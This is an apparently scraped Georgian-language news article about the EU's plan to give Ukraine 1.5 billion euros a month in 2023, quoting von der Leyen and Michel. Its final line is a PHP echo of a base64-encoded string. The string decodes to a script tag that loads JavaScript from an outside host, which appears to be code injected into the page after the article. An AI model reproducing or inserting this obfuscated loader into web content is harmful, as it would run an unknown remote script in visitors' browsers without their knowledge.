celsiusi
ავერსი შნაიდერი
ევროკავშირი 2023 წელს უკრაინას ყოველთვიურად 1.5 მილიარდ ევროს გამოუყოფს. ამის შესახებ ბრიუსელში გამართული სამიტის დასრულებისას ევროკომისიის პრეზიდენტმა ურსულა ფონ დერ ლაიენმა განაცხადა.
 
ამგვარად, ევროკავშირი 2023 წელს უკრაინის დასახმარებლად 18 მილიარდი ევროს გამოყოფას გეგმავს. ამასთან, როგორც ურსულა ფონ დერ ლაიენმა აღნიშნა, ამ დრომდე ევროკავშირმა კიევს 19 მილიარდი ევრო გამოუყო.
 
„ძალიან მნიშვნელოვანია უკრაინისთვის, რომ ჰქონდეს პროგნოზირებადი და სტაბილური შემოსავალი“, -განაცხადა ევროკომისიის პრეზიდენტმა და აღნიშნა, რომ კიევის შეფასებით, მას საბაზისო საჭიროებებისთვის ყოველთვიურად 3-4 მილიარდი ევრო სჭირდება.
 
ურსულა ფონ დერ ლაიენმა ასევე განაცხადა, რომ ევროკავშირი განიხილავს, როგორ დაეხმაროს უკრაინას წყლის, ელექტროენერგიის მიწოდების აღდგენაში.
 
ამასთან, ევროპული საბჭოს პრეზიდენტმა შარლ მიშელმა აღნიშნა, რომ ევროკავშირი უკრაინის აღსადგენად გაყინული რუსული აქტივების გამოყენებას განიხილავს.
 
 
426
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");